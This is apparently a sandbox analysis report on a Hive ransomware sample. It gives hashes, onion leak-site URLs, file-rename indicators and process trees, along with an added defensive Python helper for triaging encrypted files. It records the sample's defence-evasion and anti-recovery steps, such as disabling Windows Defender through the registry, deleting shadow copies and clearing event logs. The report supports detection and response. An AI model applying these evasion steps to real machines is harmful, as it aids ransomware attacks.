Analysis
max time kernel: 130s
max time network: 127s
platform: windows10_x64
resource: win10-en-20211208
submitted: 12-01-2022 16:59
Static task: static1
Behavioral task: behavioral1
Sample: 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe
Resource: win7-en-20211208
General
Target: 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe
Size: 2.7MB
MD5: 583ce06f5812bbb83e7388b58e7498f5
SHA1: 9e8dafdfea6b79dc3f13b582529caa451f5a6355
SHA256: 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d
SHA512: 2db707dbd5137b58f9178de1e963e5a7c13196c2c656c39c9e7d31d70cd28759f46e4b5c2e109f6f44d6fbd07a1bf09c6a720b32e1a2695ecf9fa51b7182f6ce
Malware Config
Extracted
Family: hive
Ransom note: C:\MyEY_HOW_TO_DECRYPT.txt
URLs:
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures

Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
Uses the MpCmdRun utility to delete all AV definitions.
Processes:
pid   process
604   MpCmdRun.exe
Hive
A ransomware written in Golang, first seen in June 2021.

Modifies security service (2 TTPs, 1 IoC)
Processes:
description       ioc                                                                     process
Set value (int)   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"   reg.exe
A Start value of 4 is SERVICE_DISABLED: the Windows Defender service (WinDefend) will not be started on the next boot.
Clears Windows event logs (1 TTP)

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
Processes:
pid    process
1580   bcdedit.exe
3160   bcdedit.exe
Modifies extensions of user files (16 IoCs)
Ransomware generally changes the extension on encrypted files.
Processes (the process for every row is 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe):
description                   ioc
File renamed                  C:\Users\Admin\Pictures\ConvertUndo.raw => C:\Users\Admin\Pictures\ConvertUndo.raw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_E09cKgYNav00.fayg2
File opened for modification  C:\Users\Admin\Pictures\ExitDisable.tiff.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_qNlJd3YsouQ0.fayg2
File renamed                  C:\Users\Admin\Pictures\GetConvert.raw => C:\Users\Admin\Pictures\GetConvert.raw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_fYUllUM0caM0.fayg2
File opened for modification  C:\Users\Admin\Pictures\GetConvert.raw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_fYUllUM0caM0.fayg2
File renamed                  C:\Users\Admin\Pictures\UnblockRead.crw => C:\Users\Admin\Pictures\UnblockRead.crw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_Xnx3lhmhmPE0.fayg2
File opened for modification  C:\Users\Admin\Pictures\ClearUnblock.tif.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_FqTs8GjBaJk0.fayg2
File opened for modification  C:\Users\Admin\Pictures\ConvertFromWatch.tif.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_cJn0DEq6Rgg0.fayg2
File renamed                  C:\Users\Admin\Pictures\ExitDisable.tiff => C:\Users\Admin\Pictures\ExitDisable.tiff.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_qNlJd3YsouQ0.fayg2
File renamed                  C:\Users\Admin\Pictures\RevokeShow.crw => C:\Users\Admin\Pictures\RevokeShow.crw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_O0kq1w2cnno0.fayg2
File opened for modification  C:\Users\Admin\Pictures\RevokeShow.crw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_O0kq1w2cnno0.fayg2
File opened for modification  C:\Users\Admin\Pictures\UnblockRead.crw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_Xnx3lhmhmPE0.fayg2
File renamed                  C:\Users\Admin\Pictures\UnregisterUninstall.raw => C:\Users\Admin\Pictures\UnregisterUninstall.raw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_o4__AM0vRh00.fayg2
File opened for modification  C:\Users\Admin\Pictures\UnregisterUninstall.raw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_o4__AM0vRh00.fayg2
File renamed                  C:\Users\Admin\Pictures\ClearUnblock.tif => C:\Users\Admin\Pictures\ClearUnblock.tif.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_FqTs8GjBaJk0.fayg2
File renamed                  C:\Users\Admin\Pictures\ConvertFromWatch.tif => C:\Users\Admin\Pictures\ConvertFromWatch.tif.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_cJn0DEq6Rgg0.fayg2
File opened for modification  C:\Users\Admin\Pictures\ConvertUndo.raw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_E09cKgYNav00.fayg2
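Every rename above follows one shape: the full original name is kept, then a 43-character token that is the same for all 16 files, an underscore, a 12-character token that differs per file, and the extension .fayg2. The ransom note MyEY_HOW_TO_DECRYPT.txt is dropped alongside. The helper below is an added example written for this page, not code from the sandbox report or from the Hive malware: it parses that naming shape to recover original file names, separates ransom notes from encrypted files, and checks that a batch of names carries a single shared token. The fixed token widths (43 and 12) are an assumption taken from these 16 renames, not a documented Hive format; the sample paths are copied from this report plus one constructed non-Hive path.

```python
"""Triage helper for the file-naming pattern seen in this Hive report."""
import re
from collections import Counter
from typing import Dict, List, NamedTuple, Optional

# Observed in the "Modifies extensions of user files" rows: a renamed file keeps its
# full original name and gains ".<43-char token>_<12-char token>.fayg2". The 43-char
# token was identical for every file in this run, the 12-char token differed per file.
# Treating both as fixed-width is an ASSUMPTION drawn from those rows, not a
# documented Hive format; adjust the widths if another sample differs.
RANSOM_NOTE = "MyEY_HOW_TO_DECRYPT.txt"        # dropped into each encrypted directory
ENCRYPTED_EXT = ".fayg2"
TOKEN = r"[A-Za-z0-9_\-]"
HIVE_NAME_RE = re.compile(
    rf"^(?P<original>.+)\.(?P<shared>{TOKEN}{{43}})_(?P<per_file>{TOKEN}{{12}})"
    rf"{re.escape(ENCRYPTED_EXT)}$"
)


class HiveName(NamedTuple):
    original: str   # path as it was before encryption
    shared: str     # token common to every file of one run
    per_file: str   # token unique to this file


def parse_hive_name(path: str) -> Optional[HiveName]:
    """Split a Hive-renamed path into its parts, or return None if it does not match."""
    m = HIVE_NAME_RE.match(path)
    return HiveName(m["original"], m["shared"], m["per_file"]) if m else None


def basename(path: str) -> str:
    # Windows paths: os.path on a POSIX analysis host would not split on backslashes.
    return path.rsplit("\\", 1)[-1]


def inventory(paths: List[str]) -> Dict[str, object]:
    """Classify paths from a file-system sweep (or this report) into encrypted files,
    ransom notes and untouched files, and check that one shared token covers the run."""
    encrypted: List[HiveName] = []
    notes: List[str] = []
    untouched: List[str] = []
    shared_tokens: Counter = Counter()
    for p in paths:
        parsed = parse_hive_name(p)
        if parsed:
            encrypted.append(parsed)
            shared_tokens[parsed.shared] += 1
        elif basename(p) == RANSOM_NOTE:
            notes.append(p)
        else:
            untouched.append(p)
    # More than one shared token means several runs (or keys), or that the
    # fixed-width assumption above does not hold for this data.
    return {
        "encrypted": encrypted,
        "notes": notes,
        "untouched": untouched,
        "shared_tokens": dict(shared_tokens),
        "single_run": len(shared_tokens) <= 1,
    }


# Constructed sample: five paths copied from this report (three encrypted files, one
# ransom note, one file that kept its name) plus one made-up path.
SAMPLE_PATHS = [
    r"C:\Users\Admin\Pictures\ConvertUndo.raw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_E09cKgYNav00.fayg2",
    r"C:\Users\Admin\Pictures\UnregisterUninstall.raw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_o4__AM0vRh00.fayg2",
    r"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\tl.gif.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_Ij5-2TZ_N-40.fayg2",
    r"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ru-ru\MyEY_HOW_TO_DECRYPT.txt",
    r"C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\snooze.png",
    r"C:\Users\Admin\Documents\report.docx",
]

if __name__ == "__main__":
    result = inventory(SAMPLE_PATHS)
    for item in result["encrypted"]:
        print(f"{item.original}  (per-file token {item.per_file})")
    print("ransom notes:", len(result["notes"]), " untouched:", len(result["untouched"]))
    print("single shared token:", result["single_run"], result["shared_tokens"])
```

Because the shared token itself contains an underscore (PrgkD_wfXd), splitting on "_" is not a safe way to separate the two tokens; anchoring on the fixed widths from the end of the name is. If a sweep yields more than one shared token, treat it as a signal that either several runs hit the host or that the widths assumed here do not apply.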
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Drops file in Program Files directory (64 IoCs)
Processes (the process for every row is 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe):
description                   ioc
File opened for modification  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarMediumTile.scale-125.png
File created                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-il\MyEY_HOW_TO_DECRYPT.txt
File opened for modification  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-actions.xml.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_YjkjK1zNz6k0.fayg2
File opened for modification  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler.xml.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_g3YGpliQpV80.fayg2
File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\snooze.png
File opened for modification  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\GenericMailMediumTile.scale-200.png
File opened for modification  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_zh_4.4.0.v20140623020002.jar.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_xIes2C3GJjM0.fayg2
File opened for modification  C:\Program Files\Windows Media Player\ja-JP\mpvis.dll.mui
File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\zh-cn\ui-strings.js.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_56X9YDnq9T80.fayg2
File created                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\da-dk\MyEY_HOW_TO_DECRYPT.txt
File opened for modification  C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\FileIcons\FileLogoExtensions.targetsize-64.png
File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-96_altform-unplated.png
File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\cs_get.svg.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_YWM-xxoZpJo0.fayg2
File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sl-si\ui-strings.js.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_N48kz_S-KhI0.fayg2
File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\uk-ua\ui-strings.js.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_CLyQYkX5yas0.fayg2
File opened for modification  C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\1851_32x32x32.png
File opened for modification  C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\large\dog.png
File opened for modification  C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\yes.png
File opened for modification  C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat
File opened for modification  C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PAPYRUS\THMBNAIL.PNG.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_HcI12rm-7Fo0.fayg2
File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AlarmsBadge.scale-100.png
File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\tl.gif.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_Ij5-2TZ_N-40.fayg2
File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_Kknn9XxJp980.fayg2
File opened for modification  C:\Program Files\7-Zip\Lang\hr.txt.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_KzNTLt6yQ0k0.fayg2
File opened for modification  C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\Informix.xsl.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_tjg-o2N9eH80.fayg2
File opened for modification  C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\CancelGlyph.16.GrayF.png.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_ctjZqlq9_4I0.fayg2
File opened for modification  C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECLIPSE\THMBNAIL.PNG.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_n1kC6pWPWS40.fayg2
File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\tr-tr\ui-strings.js.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_qJ0ZSxE6MLI0.fayg2
File opened for modification  C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-80.png.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_hr28k-k8PzA0.fayg2
File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluDCFilesEmpty_180x180.svg.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_-7vNXyV189g0.fayg2
File opened for modification  C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\en_GB\List.txt.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_epsLSXRoy1s0.fayg2
File created                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ru-ru\MyEY_HOW_TO_DECRYPT.txt
File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pl-pl\ui-strings.js.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_J8MMLlYYKFg0.fayg2
File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\root\ui-strings.js.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_MciW4qZaIZQ0.fayg2
File opened for modification  C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\4.jpg
File opened for modification  C:\Program Files\WindowsApps\Microsoft.NET.Native.Runtime.1.3_1.3.23901.0_x86__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat
File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\Icons\icon_done.png
File opened for modification  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxCalendarWideTile.scale-150.png
File opened for modification  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\1937_24x24x32.png
File opened for modification  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\OutlookMailMediumTile.scale-100.png
File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\fillandsign.svg.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_ubujE1IbqKY0.fayg2
File opened for modification  C:\Program Files\Microsoft Office\root\Office16\1033\POWERPNT_F_COL.HXK.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_vhYEu46qc280.fayg2
File opened for modification  C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-96_altform-unplated_contrast-black.png
File opened for modification  C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Fues\Popup_shadow_1.png
File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-black_targetsize-96_altform-unplated.png
File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\VisioStdR_Retail-pl.xrm-ms.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_SfuHP0aEGT80.fayg2
File opened for modification  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_l-Yk8OlUc5M0.fayg2
File opened for modification  C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageBadgeLogo.scale-200_contrast-white.png
File opened for modification  C:\Program Files (x86)\Common Files\System\msadc\de-DE\msadcor.dll.mui.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_m1YXZJFjCUA0.fayg2
File created                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ko-kr\MyEY_HOW_TO_DECRYPT.txt
File opened for modification  C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Buttons\Undo\Undo-up.mobile.png
File opened for modification  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\OutlookMailSmallTile.scale-400.png
File opened for modification  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Yahoo-Light.scale-300.png
File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filterselected-dark-hover_32.svg.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_rMDPNrJpn3k0.fayg2
File opened for modification  C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Green.xml.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_KSLlgM8ub4k0.fayg2
File opened for modification  C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\Assets\starttile.wink.scale-200.png
File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-60_altform-unplated.png
File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\logo_retina.png.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_IUEyHQ8A1zk0.fayg2
File opened for modification  C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubWideTile.scale-125.png
File opened for modification  C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\EmbossBitmaps\Sun.png
File opened for modification  C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-60_altform-unplated.png
File opened for modification  C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Logos\StoreLogo\PaintApplist.scale-100.png
File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nb-no\ui-strings.js.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_Maw5vkKhUd80.fayg2
File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Light.pdf.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_nabgR66mXPo0.fayg2
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
Interacts with shadow copies (2 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
pid    process
3616   vssadmin.exe
Modifies registry class (3 IoCs)
Processes:
description   ioc                                                                           process
Key deleted   \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP            reg.exe
Key deleted   \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP    reg.exe
Key deleted   \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP        reg.exe
EPP is the Windows Defender shell extension that provides the "Scan with Microsoft Defender" entry in the Explorer context menu for files, folders and drives; removing it is Defender tampering, in line with the WinDefend Start = "4" change recorded under "Modifies security service".
Opens file in notepad (likely ransom note) (1 IoC)
Processes:
pid    process
2684   notepad.exe

Runs net.exe

Runs ping.exe (1 TTP, 1 IoC)
Suspicious behavior: EnumeratesProcesses (8 IoCs)
Processes:
pid    process                                                                  occurrences
596    powershell.exe                                                           3
2364   powershell.exe                                                           3
3132   25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe   2
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes:
pid    process        privileges enabled (Token:)
3832   wevtutil.exe   SeSecurityPrivilege, SeBackupPrivilege
3800   wevtutil.exe   SeSecurityPrivilege, SeBackupPrivilege
1348   wevtutil.exe   SeSecurityPrivilege, SeBackupPrivilege
764    wmic.exe       SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
404    wmic.exe       SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
404    wmic.exe       (second adjustment) SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege
The listing ends at 64 entries, so the final group for PID 404 may be cut short. The numeric entries 33 to 36 are privilege LUIDs the sandbox did not resolve to names (SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege, SeDelegateSessionUserImpersonatePrivilege). The three wevtutil.exe instances enabling SeSecurityPrivilege and SeBackupPrivilege are consistent with the "Clears Windows event logs" signature: SeSecurityPrivilege is required to clear the Security log.
Suspicious use of WriteProcessMemory (64 IoCs)
Processes (the sandbox records each write twice; the 32 distinct parent/child pairs are listed once here):
source pid   source process                                                           target pid   target process
3132         25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe   2328         net.exe
2328         net.exe                                                                  1360         net1.exe
3132         25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe   2648         net.exe
2648         net.exe                                                                  972          net1.exe
3132         25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe   896          net.exe
896          net.exe                                                                  764          net1.exe
3132         25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe   2200         net.exe
2200         net.exe                                                                  3548         net1.exe
3132         25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe   3256         net.exe
3256         net.exe                                                                  3336         net1.exe
3132         25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe   3304         net.exe
3304         net.exe                                                                  3468         net1.exe
3132         25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe   1404         net.exe
1404         net.exe                                                                  1716         net1.exe
3132         25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe   1624         net.exe
1624         net.exe                                                                  1084         net1.exe
3132         25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe   408          net.exe
408          net.exe                                                                  372          net1.exe
3132         25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe   692          sc.exe
3132         25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe   2212         sc.exe
3132         25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe   904          sc.exe
3132         25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe   1296         sc.exe
3132         25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe   1236         sc.exe
3132         25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe   1476         sc.exe
3132         25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe   1636         sc.exe
3132         25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe   1920         sc.exe
3132         25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe   2236         sc.exe
3132         25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe   2168         reg.exe
3132         25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe   3408         reg.exe
